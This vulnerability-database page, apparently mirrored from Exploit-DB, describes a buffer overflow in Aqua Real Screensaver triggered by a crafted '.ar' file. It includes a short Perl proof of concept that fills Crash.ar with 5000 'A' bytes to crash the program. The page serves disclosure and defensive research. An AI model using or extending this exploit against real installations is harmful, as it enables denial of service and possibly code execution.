Lucene search
K

Aqua Real Screensaver - '.ar' Buffer Overflow

🗓️ 15 Jan 2010 00:00:00Reported by R3d-D3V!LType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 14 Views

Aqua Real Screensaver Buffer Overflow Vulnerabilit

Code
source: https://www.securityfocus.com/bid/40606/info

Aqua Real Screensaver is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions.

Aqua Real 1 and 2 are vulnerable; other versions may also be affected. 

#!c/perl/bin/
my $file= "Crash.ar";
my $boom="\x41" x 5000;
open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n";
print myfile $boom;
print "Done..!~#\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation